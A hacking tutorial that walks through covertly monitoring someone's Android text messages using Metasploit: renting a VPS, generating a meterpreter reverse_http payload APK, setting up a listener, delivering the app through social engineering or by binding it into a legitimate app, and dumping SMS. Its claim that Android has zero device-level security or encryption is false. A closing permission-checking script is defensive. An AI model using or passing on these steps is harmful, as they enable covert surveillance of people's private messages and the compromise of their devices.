Is it possible to monitor someone’s text messages on Android without having their phones? The answer is a concrete yes! And this tutorial shows how to do that using the Metasploit Framework.
Android phones have zero device-level security or encryption. This means that data stored on the Android system can be accessed by apps or other methods very easily in readable formats. Anyone can essentially make an app that can send and receive data out of it and be able to read it in cleartext.
And also because Android is open-sourced, it’s not too difficult for attackers to make these malicious apps that can hook into the Android system to retrieve information the attacker cares about.
What You’ll Need
I am going to be demonstrating how easy it is to monitor the text messages on my Android phone in this tutorial over the internet or wide area network (WAN).
This would be unlike the other tutorials on this same topic that are done over a local area network (LAN). Thus, you are going to be needing the following:
- A VPS server. You can rent a cheap VPS from Digital Ocean for $10 using this link.
- Metasploit-Framework Installed. On the VPS, install the latest version of Metasploit.
- An Android phone. This will serve as the target whose text messages we are remotely monitoring.
Monitor Text Messages on Someone’s Phone Without Them Knowing
You can follow the rest of this written guide, or click this video below if you want to watch a live demo of me spying or monitoring text messages on my own Android phone.
Step 1: Acquire & Connect to the Attack VPS Server
There are very few VPS services out there that allow penetration testing or hacking activities to be done from their servers, and Digital Ocean is one of them.
So head over to Digital Ocean website and create an account. When you’re signed in, create a new droplet. Droplet is what Digital Ocean calls their VPS instances.
Choose an image or distribution to install. Since Metasploit is a Debian based project we would select the latest version of Debian.
Next, you want to select a plan. The basic $10 plan which gives 2GB of RAM and 1CPU core would suffice for running this test.
Select a datacenter region. Generally, the closer the datacenter region to the target the better.
Set a password for authenticating to the VPS droplet. It’s recommended to use SSH Keys for a more secure auth but we will use a password to keep things simple.
Finally, click “Create Droplet” to spin up the server. The process is pretty fast and in a moment you’ll be presented with the IP address of your new server.
Now to connect to the server, Linux and Mac users can fire up a terminal window and type in the following command.
ssh root@<the VPS IP address>
It would prompt for the password you set during creation.
But if you’re running a Windows PC, you are going to need to install a program to communicate to the server. And Putty SSH client is the best recommendation.
Head over to their official website to download the latest version of Putty and install it. The installation is a breeze and in a moment you’re up and running.
Now to connect with Putty to your VPS server, type in the IP address of the server in the Hostname field and click open.
The username is root and the password is the one you set during the VPS creation.
Step 2: Install Metasploit Framework
After you log in to the VPS server you are going to install the Metasploit Framework which is our tool of attack.
But before that let’s upgrade and update the server so that things run smoothly.
apt update && apt upgrade -y
Next, run the below command to install some dependencies.
apt install curl gnupg gnupg1 gnupg2 -y
After which, run this long multi-line command to install the Metasploit package.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
After the installation completes, drop super user (root) privileges by creating a standard user.
This is so that we can start msfconsole as a standard user, which will allow us to answer the setup questions to create the Metasploit database. Creating a database makes searching through modules much faster and also adds other perks.
adduser <give your preferred username here>
Drop from root.
su <your username goes here>
Run msfconsole to set up the MSF database.
Press enter on all the questions to accept, and soon you’ll end up with a screen similar to mine below when Metasploit is started.
You can confirm the database is connected by typing db_status within Metasploit.
Step 3: Setup the Attack
With all that prep out of the way let’s get into the fun part where we setup the attack for our first target.
So there are two things we need to do.
First, we will create the payload which the target will install to penetrate their Android phone, then we’ll set up the listener or command & control (C2) server to receive the callback connection from the phone.
To create the payload type in the following command. This will generate an APK file or Android app of about 10KB that will hook the target Android phone when installed.
msfvenom -p android/meterpreter/reverse_http LHOST=10.0.0.1 LPORT=8080 > evil.apk
msfvenom is the payload generation tool within the Metasploit Framework
-p indicates the type of payload
android/meterpreter/reverse_http is the reverse meterpreter shell that will connect the Android phone back to our listener or command & control server (C2)
LHOST is the IP address of your VPS server
LPORT is the listening port
> evil.apk will package/build all of that malicious code into an APK file (or Android App), which in this case we have named ‘evil’
To set up the listener, type in the following commands. It’s important to note here that for this to work, both LHOST & LPORT should be the same as that of the payload.
use multi/handler set PAYLOAD /android/meterpreter/reverse_http set LHOST 10.0.0.1 set LPORT 8080 set exitonsession false exploit -j
Step 4: Deliver the Payload
OK, what is left is how to deliver the payload to the target Android device. And there are not too many ways an attacker could go about this other than to use social engineering techniques.
So one way to do this is by binding this malicious APK file or App into another Android App that is legitimate and then social engineering the target to install it on their phone.
Once they install it, their Android phone becomes backdoored to our Metasploit C2 server from where we can issue commands to the device.
But for the purposes of this tutorial, we are just going to access the attacker machine and download the APK payload on the Android device directly.
So we will create a quick server to enable downloading the payload using the below command.
python -m SimpleHTTPServer
Now enter the IP address of the server and the default port 8000 on a browser to access the payload.
(Don’t forget to press ctrl + c to kill the Simple HTTP server after downloading the payload)
After downloading, find the app from the file manager and install it. Launch the app and you will see all the permissions the app is requesting to run with, which is ALL permissions an Android app could request for.
Once the user runs the app, a meterpreter session or connection should be established back to our attacker machine or C2 server.
Step 5: Dump Text Messages of Target Android Phone
Finally, it’s time to monitor the text messages on the target Android phones. I say phones because as many Android devices that install and run our little backdoor app will become zombies to our online Metasploit C2 server.
So to control a particular session or device, type in the following command to interact with that session.
sessions -i <session id number>
Once you’re in a meterpreter session, you can type help to see a list of all commands you can put in the session to control the target Android device.
You can see File System Commands for navigating around to where sensitive information or data are on the Android device. And at this point, you can easily download or upload any information or data.
There is a lot you can do with the backdoor on this Android device but our focus for this post is to monitor the text messages.
Now let’s extract every SMS text messages that have been sent back and forth with this Android device by entering the command
This will save the extracted SMS in our local directory on the VPS server. We can cat out the file to see the content or download it from the server for closer scrutiny.
Now cross-check the extracted SMS text message with the one from my Android phone which I hacked.
You can check for new text messages on the Android device by running the dump_sms command again. And if there are new SMS received on the device, they’ll be extracted and the list updated.
That is how easy it is to spy on SMS text messages on Android devices. To prevent these kinds of attacks from happening to you, you should always be wary of installing applications that are not from the Play Store.
If you must install apps from outside the Play Store, make sure you check what permissions you’re granting the app to run with. And if an app is requesting more permissions than it needs to run, you should uninstall it or not install it at all.
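The permission check recommended above can be automated before an APK is installed. The following is an added example, not part of the original tutorial: it assumes the output of `aapt dump permissions <apk>` has been saved as text, and the sensitive-permission list, the threshold and both sample listings are constructed for illustration.

```python
import re

# Subset of Android "dangerous" permissions that expose private data
# (selection and threshold below are assumptions for this example).
SENSITIVE = {
    "READ_SMS", "SEND_SMS", "RECEIVE_SMS", "READ_CONTACTS", "READ_CALL_LOG",
    "RECORD_AUDIO", "CAMERA", "ACCESS_FINE_LOCATION", "READ_PHONE_STATE",
}
SMS_READ = {"READ_SMS", "RECEIVE_SMS"}

# Accepts both listing styles printed by aapt:
#   uses-permission: name='android.permission.READ_SMS'
#   uses-permission: android.permission.READ_SMS
PERM_RE = re.compile(r"^uses-permission:\s*(?:name=)?'?([\w.]+)'?")

def parse_permissions(listing):
    """Return the short permission names found in an aapt listing."""
    perms = set()
    for line in listing.splitlines():
        m = PERM_RE.match(line.strip())
        if m:
            perms.add(m.group(1).rsplit(".", 1)[-1])
    return perms

def assess(listing, max_sensitive=3):
    """Flag SMS-read plus network access, and broad sensitive requests."""
    perms = parse_permissions(listing)
    sensitive = sorted(perms & SENSITIVE)
    findings = []
    if perms & SMS_READ and "INTERNET" in perms:
        findings.append("can read SMS and send data over the network")
    if len(sensitive) > max_sensitive:
        findings.append(f"requests {len(sensitive)} sensitive permissions")
    return {"sensitive": sensitive, "findings": findings,
            "suspicious": bool(findings)}

# Constructed sample listings (not taken from real apps).
BENIGN_SAMPLE = """package: com.example.torch
uses-permission: name='android.permission.CAMERA'
uses-permission: name='android.permission.INTERNET'"""

OVERBROAD_SAMPLE = """package: com.example.unknown
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.READ_CONTACTS'
uses-permission: name='android.permission.RECORD_AUDIO'
uses-permission: name='android.permission.CAMERA'
uses-permission: android.permission.ACCESS_FINE_LOCATION"""

if __name__ == "__main__":
    for name, sample in (("torch", BENIGN_SAMPLE), ("unknown", OVERBROAD_SAMPLE)):
        print(name, assess(sample))
```

A flagged result is a prompt to review the app by hand, not a verdict; legitimate messaging apps also request SMS and network access.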
Hope you enjoyed this tutorial, keep coming back for more hacking tutorials like this. If you have a question, you can ask me in the comments section below. And feel free to reach out to me @ojoiszy on Twitter and Instagram if you have tutorials you’ll love to see.